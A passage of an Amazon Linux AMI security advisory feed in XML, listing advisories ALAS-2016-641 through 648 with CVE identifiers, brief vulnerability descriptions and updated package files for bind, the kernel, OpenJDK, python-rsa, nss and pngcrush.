name="php56-recode" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-recode-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-imap" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-imap-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php56-pgsql" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pgsql-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-mcrypt" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mcrypt-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php55-pdo" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pdo-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php55-mysqlnd" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mysqlnd-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php55-soap" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-soap-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php55-debuginfo" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-debuginfo-5.5.31-1.111.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-641</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-641: medium priority package update for bind</title><issued date="2016-01-19 12:00:00" /><updated date="2016-01-19 12:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-8704:
Embargoed
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8704" title="" id="CVE-2015-8704" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-sdb" version="9.8.2" release="0.37.rc1.43.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.37.rc1.43.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.37.rc1.43.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.37.rc1.43.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.37.rc1.43.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.37.rc1.43.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.37.rc1.43.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.37.rc1.43.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.37.rc1.43.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.37.rc1.43.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.37.rc1.43.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.37.rc1.43.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.37.rc1.43.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.37.rc1.43.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.37.rc1.43.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.37.rc1.43.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.37.rc1.43.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.37.rc1.43.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.37.rc1.43.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.37.rc1.43.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.37.rc1.43.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.37.rc1.43.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.37.rc1.43.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.37.rc1.43.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.37.rc1.43.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.37.rc1.43.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.37.rc1.43.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.37.rc1.43.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-642</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-642: medium priority package update for kernel</title><issued date="2016-01-19 17:07:00" /><updated date="2016-01-19 19:08:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-0728:
1297475:
CVE-2016-0728 kernel: Possible use-after-free vulnerability in keyring facility
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0728" title="" id="CVE-2016-0728" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools" version="4.1.13" release="19.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.1.13-19.31.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.1.13" release="19.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.1.13-19.31.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.1.13" release="19.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.1.13-19.31.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.1.13" release="19.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.1.13-19.31.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.1.13" release="19.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.1.13-19.31.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.1.13" release="19.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.1.13-19.31.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.1.13" release="19.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.1.13-19.31.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.1.13" release="19.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.1.13-19.31.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.1.13" release="19.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.1.13-19.31.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.1.13" release="19.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.1.13-19.31.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.1.13" release="19.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.1.13-19.31.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.1.13" release="19.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.1.13-19.31.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.1.13" release="19.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.1.13-19.31.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.1.13" release="19.31.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.1.13-19.31.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.1.13" release="19.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.1.13-19.31.amzn1.i686.rpm</filename></package><package name="kernel" version="4.1.13" release="19.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.1.13-19.31.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.1.13" release="19.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.1.13-19.31.amzn1.i686.rpm</filename></package><package name="perf" version="4.1.13" release="19.31.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.1.13-19.31.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.1.13" release="19.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.1.13-19.31.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.1.13" release="19.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.1.13-19.31.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.1.13" release="19.31.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.1.13-19.31.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-643</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-643: important priority package update for java-1.7.0-openjdk</title><issued date="2016-02-09 13:30:00" /><updated date="2016-02-09 13:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-0494:
An integer signedness issue was found in the font parsing code in the 2D component in OpenJDK. A specially crafted font file could possibly cause the Java Virtual Machine to execute arbitrary code, allowing an untrusted Java application or applet to bypass Java sandbox restrictions.
CVE-2016-0483:
An out-of-bounds write flaw was found in the JPEG image format decoder in the AWT component in OpenJDK. A specially crafted JPEG image could cause a Java application to crash or, possibly execute arbitrary code. An untrusted Java application or applet could use this flaw to bypass Java sandbox restrictions.
CVE-2016-0466:
It was discovered that the JAXP component in OpenJDK did not properly enforce the totalEntitySizeLimit limit. An attacker able to make a Java application process a specially crafted XML file could use this flaw to make the application consume an excessive amount of memory.
CVE-2016-0448:
Multiple flaws were discovered in the Libraries, Networking, and JMX components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2016-0402:
Multiple flaws were discovered in the Libraries, Networking, and JMX components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2015-7575:
A flaw was found in the way TLS 1.2 could use the MD5 hash function for signing ServerKeyExchange and Client Authentication packets during a TLS handshake. A man-in-the-middle attacker able to force a TLS connection to use the MD5 hash function could use this flaw to conduct collision attacks to impersonate a TLS server or an authenticated TLS client.
CVE-2015-4871:
Multiple flaws were discovered in the Libraries, Networking, and JMX components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4871" title="" id="CVE-2015-4871" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7575" title="" id="CVE-2015-7575" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0402" title="" id="CVE-2016-0402" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0448" title="" id="CVE-2016-0448" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0466" title="" id="CVE-2016-0466" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0483" title="" id="CVE-2016-0483" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0494" title="" id="CVE-2016-0494" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2016:0053.html" title="" id="RHSA-2016:0053" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.95" release="2.6.4.0.65.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.95-2.6.4.0.65.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.95" release="2.6.4.0.65.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.95-2.6.4.0.65.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.95" release="2.6.4.0.65.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.95-2.6.4.0.65.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.95" release="2.6.4.0.65.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.95-2.6.4.0.65.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.95" release="2.6.4.0.65.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.95-2.6.4.0.65.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.95" release="2.6.4.0.65.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.95-2.6.4.0.65.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.95" release="2.6.4.0.65.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.95-2.6.4.0.65.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.95" release="2.6.4.0.65.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.95-2.6.4.0.65.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.95" release="2.6.4.0.65.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.95-2.6.4.0.65.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.95" release="2.6.4.0.65.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.95-2.6.4.0.65.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.95" release="2.6.4.0.65.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.95-2.6.4.0.65.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-644</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-644: medium priority package update for python-rsa</title><issued date="2016-02-09 13:30:00" /><updated date="2016-02-09 13:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-1494:
1295869:
CVE-2016-1494 python-rsa: Signature forgery using Bleichenbacher'06 attack
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1494" title="" id="CVE-2016-1494" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python26-rsa" version="3.3" release="2.7.amzn1" epoch="0" arch="noarch"><filename>Packages/python26-rsa-3.3-2.7.amzn1.noarch.rpm</filename></package><package name="python27-rsa" version="3.3" release="2.7.amzn1" epoch="0" arch="noarch"><filename>Packages/python27-rsa-3.3-2.7.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-645</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-645: medium priority package update for nss</title><issued date="2016-02-09 13:30:00" /><updated date="2016-02-09 13:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-7575:
A flaw was found in the way TLS 1.2 could use the MD5 hash function for signing ServerKeyExchange and Client Authentication packets during a TLS handshake. A man-in-the-middle attacker able to force a TLS connection to use the MD5 hash function could use this flaw to conduct collision attacks to impersonate a TLS server or an authenticated TLS client.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7575" title="" id="CVE-2015-7575" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2016:0007.html" title="" id="RHSA-2016:0007" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nss-tools" version="3.19.1" release="19.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-tools-3.19.1-19.75.amzn1.x86_64.rpm</filename></package><package name="nss-debuginfo" version="3.19.1" release="19.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-debuginfo-3.19.1-19.75.amzn1.x86_64.rpm</filename></package><package name="nss-sysinit" version="3.19.1" release="19.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-sysinit-3.19.1-19.75.amzn1.x86_64.rpm</filename></package><package name="nss-pkcs11-devel" version="3.19.1" release="19.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-pkcs11-devel-3.19.1-19.75.amzn1.x86_64.rpm</filename></package><package name="nss-devel" version="3.19.1" release="19.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-devel-3.19.1-19.75.amzn1.x86_64.rpm</filename></package><package name="nss" version="3.19.1" release="19.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-3.19.1-19.75.amzn1.x86_64.rpm</filename></package><package name="nss-debuginfo" version="3.19.1" release="19.75.amzn1" epoch="0" arch="i686"><filename>Packages/nss-debuginfo-3.19.1-19.75.amzn1.i686.rpm</filename></package><package name="nss-pkcs11-devel" version="3.19.1" release="19.75.amzn1" epoch="0" arch="i686"><filename>Packages/nss-pkcs11-devel-3.19.1-19.75.amzn1.i686.rpm</filename></package><package name="nss-sysinit" version="3.19.1" release="19.75.amzn1" epoch="0" arch="i686"><filename>Packages/nss-sysinit-3.19.1-19.75.amzn1.i686.rpm</filename></package><package name="nss-tools" version="3.19.1" release="19.75.amzn1" epoch="0" arch="i686"><filename>Packages/nss-tools-3.19.1-19.75.amzn1.i686.rpm</filename></package><package name="nss" version="3.19.1" release="19.75.amzn1" epoch="0" arch="i686"><filename>Packages/nss-3.19.1-19.75.amzn1.i686.rpm</filename></package><package name="nss-devel" version="3.19.1" release="19.75.amzn1" epoch="0" arch="i686"><filename>Packages/nss-devel-3.19.1-19.75.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-646</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-646: low priority package update for pngcrush</title><issued date="2016-02-09 13:30:00" /><updated date="2016-02-09 13:30:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-7700:
A double-free bug was discovered in pngcrush's handling of the sPLT chunk.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7700" title="" id="CVE-2015-7700" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="pngcrush-debuginfo" version="1.7.92" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/pngcrush-debuginfo-1.7.92-1.11.amzn1.x86_64.rpm</filename></package><package name="pngcrush" version="1.7.92" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/pngcrush-1.7.92-1.11.amzn1.x86_64.rpm</filename></package><package name="pngcrush" version="1.7.92" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/pngcrush-1.7.92-1.11.amzn1.i686.rpm</filename></package><package name="pngcrush-debuginfo" version="1.7.92" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/pngcrush-debuginfo-1.7.92-1.11.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-647</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-647: important priority package update for java-1.8.0-openjdk</title><issued date="2016-02-09 13:30:00" /><updated date="2016-02-09 13:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-0494:
Unspecified vulnerability in the Java SE and Java SE Embedded components in Oracle Java SE 6u105, 7u91, and 8u66 and Java SE Embedded 8u65 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D.
1298906:
CVE-2016-0494 ICU: integer signedness issue in IndicRearrangementProcessor (OpenJDK 2D, 8140543)
CVE-2016-0483:
An out-of-bounds write flaw was found in the JPEG image format decoder in the AWT component in OpenJDK. A specially crafted JPEG image could cause a Java application to crash or, possibly execute arbitrary code. An untrusted Java application or applet could use this flaw to bypass Java sandbox restrictions.
1299441:
CVE-2016-0483 OpenJDK: incorrect boundary check in JPEG decoder (AWT, 8139017)
CVE-2016-0475:
It was discovered that the password-based encryption (PBE) implementation in the Libraries component in OpenJDK used an incorrect key length. This could, in certain cases, lead to generation of keys that were weaker than expected.
1298949:
CVE-2016-0475 OpenJDK: PBE incorrect key lengths (Libraries, 8138589)
CVE-2016-0466:
It was discovered that the JAXP component in OpenJDK did not properly enforce the totalEntitySizeLimit limit. An attacker able to make a Java application process a specially crafted XML file could use this flaw to make the application consume an excessive amount of memory.
1299385:
CVE-2016-0466 OpenJDK: insufficient enforcement of totalEntitySizeLimit (JAXP, 8133962)
CVE-2016-0448:
Unspecified vulnerability in the Java SE and Java SE Embedded components in Oracle Java SE 6u105, 7u91, and 8u66, and Java SE Embedded 8u65 allows remote authenticated users to affect confidentiality via vectors related to JMX.
1299073:
CVE-2016-0448 OpenJDK: logging of RMI connection secrets (JMX, 8130710)
CVE-2016-0402:
Unspecified vulnerability in the Java SE and Java SE Embedded components in Oracle Java SE 6u105, 7u91, and 8u66 and Java SE Embedded 8u65 allows remote attackers to affect integrity via unknown vectors related to Networking.
1298957:
CVE-2016-0402 OpenJDK: URL deserialization inconsistencies (Networking, 8059054)
CVE-2015-7575:
A flaw was found in the way TLS 1.2 could use the MD5 hash function for signing ServerKeyExchange and Client Authentication packets during a TLS handshake. A man-in-the-middle attacker able to force a TLS connection to use the MD5 hash function could use this flaw to conduct collision attacks to impersonate a TLS server or an authenticated TLS client.
1289841:
CVE-2015-7575 TLS 1.2 Transcipt Collision attacks against MD5 in key exchange protocol (SLOTH)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7575" title="" id="CVE-2015-7575" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0402" title="" id="CVE-2016-0402" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0448" title="" id="CVE-2016-0448" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0466" title="" id="CVE-2016-0466" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0475" title="" id="CVE-2016-0475" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0483" title="" id="CVE-2016-0483" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0494" title="" id="CVE-2016-0494" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.71" release="2.b15.8.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.71-2.b15.8.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.71" release="2.b15.8.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.71-2.b15.8.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.71" release="2.b15.8.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.71-2.b15.8.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.71" release="2.b15.8.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.71-2.b15.8.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.71" release="2.b15.8.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.71-2.b15.8.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.71" release="2.b15.8.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.71-2.b15.8.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.71" release="2.b15.8.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.71-2.b15.8.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.71" release="2.b15.8.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.71-2.b15.8.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.71" release="2.b15.8.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.71-2.b15.8.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.71" release="2.b15.8.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.71-2.b15.8.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.71" release="2.b15.8.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.71-2.b15.8.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.71" release="2.b15.8.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.71-2.b15.8.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.71" release="2.b15.8.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.71-2.b15.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-648</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-648: medium priority package update for kernel</title><issued date="2016-02-09 13:30:00" /><updated date="2016-02-09 13:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-0723:
1296253:
CVE-2016-0723 kernel: Kernel memory disclosure and crash in tty layer
CVE-2015-8767:
1297389:
CVE-2015-8767 kernel: SCTP denial of service during timeout
CVE-2015-8709:
A privilege-escalation vulnerability was discovered in the Linux kernel built with User Namespace (CONFIG_USER_NS) support. The flaw occurred when the ptrace() system call was used on a root-owned process to enter a user namespace. A privileged namespace user could exploit this flaw to potentially escalate their privileges on the system, outside the original namespace.
1295287:
CVE-2015-8709 Kernel: ptrace: potential privilege escalation in user namespaces
CVE-2013-4312:
1297813:
CVE-2013-4312 kernel: File descriptors passed over unix sockets are not properly accounted
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4312" title="" id="CVE-2013-4312" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8709" title="" id="CVE-2015-8709" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8767" title="" id="CVE-2015-8767" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0723" title="" id="CVE-2016-0723" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo" version="4.1.17" release="22.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.1.17-22.30.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.1.17" release="22.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.1.17-22.30.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.1.17" release="22.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.1.17-22.30.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.1.17" release="22.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.1.17-22.30.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.1.17" release="22.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.1.17-22.30.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.1.17" release="22.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.1.17-22.30.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.1.17" release="22.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.1.17-22.30.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.1.17" release="22.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.1.17-22.30.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.1.17" release="22.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.1.17-22.30.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.1.17" release="22.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.1.17-22.30.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.1.17" release="22.30.amzn1" epoch="0" 